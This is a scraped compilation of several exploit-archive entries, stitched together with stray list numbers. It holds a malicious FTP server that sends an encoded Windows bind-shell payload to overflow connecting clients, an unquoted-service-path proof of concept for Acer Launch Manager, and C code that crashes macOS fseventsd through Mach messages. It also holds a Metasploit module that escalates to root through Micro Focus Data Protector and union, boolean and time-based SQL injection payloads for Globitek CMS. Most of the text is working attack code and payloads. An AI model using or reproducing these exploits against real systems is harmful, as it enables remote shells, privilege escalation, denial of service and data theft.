sploit += "\x90" * 20 # sled for shikata_ga_nai unpack

# msfvenom -p windows/shell_bind_tcp LPORT=5150 EXITFUNC=process
# -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -i 1 -f c
# Encoded payload as published; opaque bytes, not annotated further here.
sploit += (
    "\xba\xd2\xe1\x61\xb1\xdb\xc6\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
    "\x53\x83\xeb\xfc\x31\x53\x0e\x03\x81\xef\x83\x44\xd9\x18\xc1"
    "\xa7\x21\xd9\xa6\x2e\xc4\xe8\xe6\x55\x8d\x5b\xd7\x1e\xc3\x57"
    "\x9c\x73\xf7\xec\xd0\x5b\xf8\x45\x5e\xba\x37\x55\xf3\xfe\x56"
    "\xd5\x0e\xd3\xb8\xe4\xc0\x26\xb9\x21\x3c\xca\xeb\xfa\x4a\x79"
    "\x1b\x8e\x07\x42\x90\xdc\x86\xc2\x45\x94\xa9\xe3\xd8\xae\xf3"
    "\x23\xdb\x63\x88\x6d\xc3\x60\xb5\x24\x78\x52\x41\xb7\xa8\xaa"
    "\xaa\x14\x95\x02\x59\x64\xd2\xa5\x82\x13\x2a\xd6\x3f\x24\xe9"
    "\xa4\x9b\xa1\xe9\x0f\x6f\x11\xd5\xae\xbc\xc4\x9e\xbd\x09\x82"
    "\xf8\xa1\x8c\x47\x73\xdd\x05\x66\x53\x57\x5d\x4d\x77\x33\x05"
    "\xec\x2e\x99\xe8\x11\x30\x42\x54\xb4\x3b\x6f\x81\xc5\x66\xf8"
    "\x66\xe4\x98\xf8\xe0\x7f\xeb\xca\xaf\x2b\x63\x67\x27\xf2\x74"
    "\x88\x12\x42\xea\x77\x9d\xb3\x23\xbc\xc9\xe3\x5b\x15\x72\x68"
    "\x9b\x9a\xa7\x05\x93\x3d\x18\x38\x5e\xfd\xc8\xfc\xf0\x96\x02"
    "\xf3\x2f\x86\x2c\xd9\x58\x2f\xd1\xe2\x72\xae\x5c\x04\x10\xde"
    "\x08\x9e\x8c\x1c\x6f\x17\x2b\x5e\x45\x0f\xdb\x17\x8f\x88\xe4"
    "\xa7\x85\xbe\x72\x2c\xca\x7a\x63\x33\xc7\x2a\xf4\xa4\x9d\xba"
    "\xb7\x55\xa1\x96\x2f\xf5\x30\x7d\xaf\x70\x29\x2a\xf8\xd5\x9f"
    "\x23\x6c\xc8\x86\x9d\x92\x11\x5e\xe5\x16\xce\xa3\xe8\x97\x83"
    "\x98\xce\x87\x5d\x20\x4b\xf3\x31\x77\x05\xad\xf7\x21\xe7\x07"
    "\xae\x9e\xa1\xcf\x37\xed\x71\x89\x37\x38\x04\x75\x89\x95\x51"
    "\x8a\x26\x72\x56\xf3\x5a\xe2\x99\x2e\xdf\x12\xd0\x72\x76\xbb"
    "\xbd\xe7\xca\xa6\x3d\xd2\x09\xdf\xbd\xd6\xf1\x24\xdd\x93\xf4"
    "\x61\x59\x48\x85\xfa\x0c\x6e\x3a\xfa\x04"
) # 355

# Pad to exactly 10000 bytes: every earlier piece's length is subtracted.
sploit += "C" * (10000 - 4116 - 4 - 12 - 1693 - 13 - 8 - 0x22 - 355 - 20)

# Canned replies keyed by a substring of the client's request line.  Matching
# is `key in req`, so e.g. "PASS" also matches any request containing it.
cases = {
    "USER": "331 user OK. Pass required",
    "PASS": "230 OK, current directory is /",
    # "SYST": "215 UNIX Type: L8",
    "SYST": sploit, # CRASH! in response to SYST cmd/request, w/"A"*5000, 41414141 in EIP and EBP
    "TYPE": "200 TYPE is whatever was just requested... \"yeah, ok\"",
    "SITE UMASK": "500 SITE UMASK is an unknown extension",
    "CWD": "250 OK, current directory whatever you think it is",
    "PORT": "200 PORT command successful",
    "PASV": "227 Entering PASV mode",
    "LIST": "150 Connecting to whatever port.\r\n226 ASCII\r\n226 Options: -a -l\r\n226 3 matches total"
}

# Listener address and port are hard-coded; a single client is accepted and
# the sockets are never closed explicitly (the loop below never exits).
sx = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sx.bind(("192.168.56.181",21))
sx.listen(5)
print("[.] Standing up HostileFTPd v0.0 alpha, port 21")
cx,addr = sx.accept()
print("[!] Connection received from %s" % str(addr))
cx.send("220 HostileFTPd v0.0 alpha !\r\n")
notified = 0
while True:
    # NOTE(review): an empty recv() (client gone) is not checked, so a closed
    # connection keeps the loop spinning on empty requests.
    req = cx.recv(1024)
    for key, resp in cases.items():
        if key in req:
            cx.send(resp + "\r\n")
            # Placement of the two inner checks inside `if key in req` is
            # reconstructed from the published one-line listing -- verify.
            if "SITE UMASK" in req and notified == 0:
                print("[!] Buffer sent. Bind shell on client's port 5150?")
                notified = 1
            if "PASV" in req:
                justpause = raw_input("[.] PASV received. Pausing recv buffer")

# Reference capture of a normal session; unreachable after the loop above.
NOTES="""\
### followed TCP stream in normal client connect to ftp server
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 13:47. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
USER bozo
331 User bozo OK. Password required
PASS theclown
230-User bozo has group access to: 1003
230 OK. Current directory is /
SYST
215 UNIX Type: L8
TYPE I
200 TYPE is now 8-bit binary
SITE UMASK 022
500 SITE UMASK is an unknown extension
CWD /
250 OK. Current directory is /
PASV
227 Entering Passive Mode (192,168,56,181,183,29)
LIST -a
150 Accepted data connection
226-ASCII
226-Options: -a -l
226 3 matches total
"""
  22. # Title: Launch Manager 6.1.7600.16385 'DsiWMIService' Unquoted Service Path # Author: Gustavo Briseño # Date: 2019-11-03 # Vendor Homepage: https://www.acer.com/ # Software Link: https://global-download.acer.com/GDFiles/Application/LaunchManager/LaunchManager_Dritek_6.1.7600.16385_W7x86W7x64_A.zip?acerid=634193506101268520&Step1=NOTEBOOK&Step2=ASPIRE&Step3=ASPIRE%204333&OS=ALLLC=es&BC=ACER&SC=PA_2#_ga=2.248825730.460116227.1572829430-701800474.1572829429 # Version : Launch Manager 6.1.7600.16385 # Tested on: Windows 7 Home Basic 64bit # CVE : N/A # ===================================================== # 1. Description: # The DsiWMIService service has an unquoted service path. #PoC =========== C:\>sc qc DsiWMIService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: DsiWMIService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Launch Manager\dsiwmis.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Dritek WMI Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\> #Exploit: ============ A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  23. # Exploit Title: Apple macOS 10.15.1 - Denial of Service (PoC) # Date: 2019-11-02 # Exploit Author: 08Tc3wBB # Vendor Homepage: Apple # Software Link: # Version: Apple macOS < 10.15.1 / iOS < 13.2 # Tested on: Tested on macOS 10.14.6 and iOS 12.4.1 # CVE : N/A # Type : DOS # https://support.apple.com/en-us/HT210721 ----- Execution file path: /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/FSEvents.framework/Versions/A/Support/fseventsd fseventsd running as root and unsandboxed on both iOS and macOS, and accessible from within the Application sandbox. ----- Analysis Env: macOS 10.14.6 I named following pseudocode functions to help you understand the execution flow. void __fastcall routine_1(mach_msg_header_t *msg, mach_msg_header_t *reply) // 0x100001285 { ... v9 = implementation_register_rpc( msg->msgh_local_port, msg[1].msgh_size, msg[4].msgh_reserved, (unsigned int)msg[4].msgh_id, *(_QWORD *)&msg[1].msgh_reserved, // input_mem1 msg[2].msgh_size >> 2, // input_mem1_len *(_QWORD *)&msg[2].msgh_remote_port, // input_mem2 msg[2].msgh_id, // input_mem2_len msg[5].msgh_remote_port, *(_QWORD *)&msg[3].msgh_bits, // input_mem3 msg[3].msgh_local_port >> 2, // input_mem3_len *(_QWORD *)&msg[3].msgh_reserved, // input_mem4 msg[4].msgh_size); // input_mem4_len ... } routine_1 will be executed when user send mach_msg to Mach Service "com.apple.FSEvents" with id 0x101D0 And routine_1 internally invokes a function called fsevent_add_client to process data included in input_mem1/input_mem2 I marked five places with: (1) (2) (3) (4) (5) These are the essential points cause this vulnerability. void *fsevent_add_client(...) { ... v25 = malloc(8LL * input_mem1_len); // (1) Allocate a new buffer with input_mem1_len, didn't initializing its content. *(_QWORD *)(eventobj + 136) = v25; // Subsequently insert that new buffer into (eventobj + 136) ... v20 = ... 
// v20 point to an array of strings that was created based on user input // The following process is doing recursive parsing to v20 index = 0LL; while ( 1 ) { v26 = *(const char **)(v20 + 8 * index); ... v28 = strstr(*(const char **)(v20 + 8 * index), "/.docid"); v27 = v26; if ( !v28 ) // (2) If input string doesn't contain "/.docid", stop further parse, go straight to strdup goto LABEL_15; if ( strcmp(v28, "/.docid") ) // (3) If an input string doesn't exactly match "/.docid", goto LABEL_16 goto LABEL_16; *(_QWORD *)(*(_QWORD *)(eventobj + 136) + 8 * index) = strdup(".docid"); LABEL_17: if ( ++index >= input_mem1_len ) goto LABEL_21; } v27 = *(const char **)(v20 + 8 * index); LABEL_15: *(_QWORD *)(*(_QWORD *)(eventobj + 136) + 8 * index) = strdup(v27); LABEL_16: if ( *(_QWORD *)(*(_QWORD *)(eventobj + 136) + 8 * index) ) goto LABEL_17; // (4) So far the new buffer has never been initialized, but if it contain any wild value, it will goto LABEL_17, which program will retain that wild value and go on to parse next input_string ... // (5) Since all values saved in the new buffer supposed to be the return value of strdup, they will all be free'd later on. So if spray works successfully, the attacker can now has the ability to call free() on any address, further develop it to modify existing memory data. } However there is a catch, fseventsd only allow input_mem1_len be 1 unless the requested proc has root privilege, led to the size of uninitialized buffer can only be 8, such small size caused it very volatile, hard to apply desired spray work unless discover something else to assist. Or exploit another system proc (sandboxed it's okay), and borrow their root credential to send the exploit msg. 
// ----- PoC
// clang poc.c -framework CoreFoundation -o poc
//
// Single-file PoC: sends the "com.apple.FSEvents" routine 0x101D0 message
// repeatedly until the daemon reports error -21, then sends one more message
// with the bug-triggering parameters.  malloc/bzero/memcpy/strlen are used
// without their own headers; on macOS they arrive transitively through
// CoreFoundation.h.
#include <stdio.h>
#include <xpc/xpc.h>
#include <CoreFoundation/CoreFoundation.h>
#include <bootstrap.h>

mach_port_t server_port = 0;

// Lazily looks up the FSEvents service port and caches it.  The return value
// of bootstrap_look_up() is not checked, so on failure server_port stays 0
// and every later message goes to MACH_PORT_NULL.
mach_port_t get_server_port(){
    if(server_port)
        return server_port;
    bootstrap_look_up(bootstrap_port, "com.apple.FSEvents", &server_port);
    return server_port;
}

int trigger_bug = 0;      // 0: benign shape of the message, 1: bug-triggering shape
int has_reach_limit = 0;  // set once the daemon answers with error code -21

// Builds and sends one routine_1 message (layout matches the analysis above).
// Returns the port name found in the reply's port descriptor.  A fresh receive
// right is allocated per call and never deallocated, and the reply port is
// released with mig_dealloc_reply_port() before the buffer is freed.
uint32_t call_routine_1(){
    struct SEND_Msg{
        mach_msg_header_t Head;
        mach_msg_body_t msgh_body;
        mach_msg_port_descriptor_t port;
        mach_msg_ool_descriptor_t mem1;
        mach_msg_ool_descriptor_t mem2;
        mach_msg_ool_descriptor_t mem3;
        mach_msg_ool_descriptor_t mem4;
        // Offset to here : +104
        uint64_t unused_field1;
        uint32_t input_num1; // +112
        uint32_t input_num2; // +116
        uint64_t len_auth1; // +120 length of mem1/mem2
        uint32_t input_num3; // +128
        uint64_t len_auth2; // +132 length of mem3/mem4
        char unused_field[20];
    };
    struct RECV_Msg{
        mach_msg_header_t Head; // Size: 24
        mach_msg_body_t msgh_body;
        mach_msg_port_descriptor_t port;
        uint64_t NDR_record;
    };
    struct SEND_Msg *msg = malloc(0x100);
    bzero(msg, 0x100);
    msg->Head.msgh_bits = MACH_MSGH_BITS_COMPLEX|MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND);
    msg->Head.msgh_size = 160;
    int kkk = get_server_port();
    msg->Head.msgh_remote_port = kkk;
    msg->Head.msgh_local_port = mig_get_reply_port();
    msg->Head.msgh_id = 0x101D0;
    msg->msgh_body.msgh_descriptor_count = 5;
    msg->port.type = MACH_MSG_PORT_DESCRIPTOR;
    msg->mem1.deallocate = false;
    msg->mem1.copy = MACH_MSG_VIRTUAL_COPY;
    msg->mem1.type = MACH_MSG_OOL_DESCRIPTOR;
    // mem2..mem4 copy mem1's descriptor flags; address/size are set below.
    memcpy(&msg->mem2, &msg->mem1, sizeof(msg->mem1));
    memcpy(&msg->mem3, &msg->mem1, sizeof(msg->mem1));
    memcpy(&msg->mem4, &msg->mem1, sizeof(msg->mem1));
    mach_port_t port1=0;
    mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port1);
    msg->port.name = port1;
    msg->port.disposition = MACH_MSG_TYPE_MAKE_SEND;
    uint64_t empty_data = 0;
    // The two branches differ only in input_num1 (5 vs 1) and in whether the
    // string carries the "/.docid" prefix the daemon looks for.
    if(trigger_bug){
        msg->input_num1 = 5;
        msg->mem1.address = &empty_data;
        msg->mem1.size = 4;
        msg->input_num2 = msg->mem1.size >> 2; // input_mem1_len_auth
        msg->mem2.address = "/.docid1";
        msg->mem2.size = (mach_msg_size_t)strlen(msg->mem2.address) + 1;
    }
    else{
        msg->input_num1 = 1;
        msg->mem1.address = &empty_data;
        msg->mem1.size = 4;
        msg->input_num2 = msg->mem1.size >> 2; // input_mem1_len_auth
        msg->mem2.address = "/.dacid1";
        msg->mem2.size = (mach_msg_size_t)strlen(msg->mem2.address) + 1;
    }
    msg->mem3.address = 0;
    msg->mem3.size = 0;
    msg->input_num3 = msg->mem3.size >> 2; // input_mem3_len_auth
    msg->mem4.address = 0;
    msg->mem4.size = 0;
    msg->len_auth1 = ((uint64_t)msg->mem2.size << 32) | (msg->mem1.size >> 2);
    msg->len_auth2 = ((uint64_t)msg->mem4.size << 32) | (msg->mem3.size >> 2);
    // In trigger mode no reply is awaited (MACH_RCV_MSG dropped); the return
    // value of mach_msg() is not checked in either mode.
    mach_msg((mach_msg_header_t*)msg, MACH_SEND_MSG|(trigger_bug?0:MACH_RCV_MSG), msg->Head.msgh_size, 0x100, msg->Head.msgh_local_port, 0, 0);
    // Reads the 32-bit field at +0x20 of the (reused) buffer as the reply's
    // error code; -21 is treated as "limit reached".
    int32_t errCode = *(int32_t*)(((char*)msg) + 0x20);
    if(errCode == -21){
        has_reach_limit = 1;
    }
    mig_dealloc_reply_port(msg->Head.msgh_local_port);
    struct RECV_Msg *recv_msg = (void*)msg;
    uint32_t return_port = recv_msg->port.name;
    free(msg);
    return return_port;
}

// Drives call_routine_1() in a loop; the returned port names are stored only
// to keep them alive.  The observable result is a crash report for fseventsd.
int main(int argc, const char * argv[]) {
    printf("PoC started running...\n");
    uint32_t aaa[1000];
    // NOTE(review): `i<=1000` runs 1001 iterations, so the final store
    // `aaa[1000]` is one past the end of the array (stack out-of-bounds
    // write) unless has_reach_limit breaks the loop earlier.
    for(int i=0; i<=1000; i++){
        if(has_reach_limit){
            trigger_bug = 1;
            call_routine_1();
            break;
        }
        aaa[i] = call_routine_1();
    }
    printf("Finished\n");
    printf("Check crash file beneath /Library/Logs/DiagnosticReports/\n");
    return 0;
}
  ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local privilege escalation via the setuid `omniresolve` binary of Micro
# Focus (HPE) Data Protector (CVE-2019-11660): the binary resolves `oracleasm`
# through the caller-controlled $PATH, so a payload named `oracleasm` placed
# in WritableDir is executed as root.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Micro Focus (HPE) Data Protector SUID Privilege Escalation',
      'Description'    => %q{
        This module exploits the trusted `$PATH` environment variable of the
        SUID binary `omniresolve` in Micro Focus (HPE) Data Protector A.10.40
        and prior. The `omniresolve` executable calls the `oracleasm` binary
        using a relative path and the trusted environment `$PATH`, which allows
        an attacker to execute a custom binary with `root` privileges.

        This module has been successfully tested on:

        HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110,
        built on Thu Aug 11 14:52:38 2016;
        Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118,
        built on Tue May 21 05:49:04 2019 on CentOS Linux release 7.6.1810 (Core)

        The vulnerability has been patched in:

        Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125,
        built on Mon Aug 19 19:22:20 2019
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          's7u55', # Discovery and Metasploit module
        ],
      'DisclosureDate' => '2019-09-13',
      'Platform'       => [ 'linux' ],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Targets'        =>
        [
          [ 'Micro Focus (HPE) Data Protector <= 10.40 build 118', upper_version: Gem::Version.new('10.40') ]
        ],
      'DefaultOptions' =>
        {
          'PrependSetgid' => true,
          'PrependSetuid' => true
        },
      'References'     =>
        [
          [ 'CVE', '2019-11660' ],
          [ 'URL', 'https://softwaresupport.softwaregrp.com/doc/KM03525630' ]
        ]
    ))
    register_options(
      [
        OptString.new('SUID_PATH', [ true, 'Path to suid executable omniresolve', '/opt/omni/lbin/omniresolve' ])
      ])
    register_advanced_options(
      [
        OptBool.new('ForceExploit', [ false, 'Override check result', false ]),
        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
      ])
  end

  # Directory that receives the dropped `oracleasm` and the trigger file.
  def base_dir
    datastore['WritableDir'].to_s
  end

  # Absolute path of the setuid omniresolve binary.
  def suid_bin_path
    datastore['SUID_PATH'].to_s
  end

  # Version check based on `omniresolve -ver` output.
  #
  # Returns Safe when the binary is not setuid or is newer than 10.40 build
  # 118, Appears when the parsed version/build is within range, and Detected
  # when the output cannot be parsed.  The regex captures three groups: the
  # `NN.NN` version, everything up to "build ", and the three-digit build.
  def check
    unless setuid? suid_bin_path
      vprint_error("#{suid_bin_path} executable is not setuid")
      return CheckCode::Safe
    end

    info = cmd_exec("#{suid_bin_path} -ver").to_s

    if info =~ /(?<=\w\.)(\d\d\.\d\d)(.*)(?<=build )(\d\d\d)/
      # Round-trip through Float so "09.07" compares as Gem::Version "9.07".
      version = '%.2f' % $1.to_f
      build = $3.to_i
      vprint_status("omniresolve version #{version} build #{build}")
      # Vulnerable: any version below upper_version, or exactly upper_version
      # with build <= 118 (the hard-coded last vulnerable build).
      unless Gem::Version.new(version) < target[:upper_version] || (Gem::Version.new(version) == target[:upper_version] && build <= 118)
        return CheckCode::Safe
      end
      return CheckCode::Appears
    end

    vprint_error("Could not parse omniresolve -ver output")
    CheckCode::Detected
  end

  # Drops the payload as `<WritableDir>/oracleasm`, writes a random trigger
  # file, and runs omniresolve with WritableDir prepended to $PATH so the
  # dropped binary is resolved first.  Both files are registered for cleanup.
  def exploit
    if check == CheckCode::Safe
      unless datastore['ForceExploit']
        fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
      end
    end

    unless writable?(base_dir)
      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
    end

    payload_path = File.join(base_dir, 'oracleasm')
    register_file_for_cleanup(payload_path)
    write_file(payload_path, generate_payload_exe)
    chmod(payload_path)

    trigger_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
    register_file_for_cleanup(trigger_path)
    write_file(trigger_path, "#{rand_text_alpha(5..10)}:#{rand_text_alpha(5..10)}")

    # Backgrounded with `&` so the session is not blocked by the child;
    # the trailing `echo` gives cmd_exec a line to return.
    cmd_exec("env PATH=\"#{base_dir}:$PATH\" #{suid_bin_path} -i #{trigger_path} & echo ")
  end
end
  25. # Exploit Title: thejshen Globitek CMS 1.4 - 'id' SQL Injection # Date: 2019-11-01 # Exploit Author: Cakes # Vendor Homepage: https://github.com/thejshen/contentManagementSystem # Software Link: https://github.com/thejshen/contentManagementSystem.git # Version: 1.4 # Tested on: CentOS 7 # CVE: N/A # The GET request for content ID is vulnerable to Union, Boolean and Time-Based Blind SQL injection # Parameter: id (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Vector: AND [INFERENCE] Payload: id=4' AND 5143=5143-- OWXt # Type: time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) # Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) Payload: id=4' AND (SELECT 4841 FROM (SELECT(SLEEP(5)))eqmp)-- ZwTG # Type: UNION query # Title: Generic UNION query (NULL) - 5 columns # Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL[GENERIC_SQL_COMMENT] Payload: id=-4903' UNION ALL SELECT NULL,NULL,CONCAT(0x716a706b71,0x66766f636c546750775053685352676c4f70724d714c4b64494e755252765a626370615a565a4b49,0x717a6a7671),NULL,NULL-- hkoh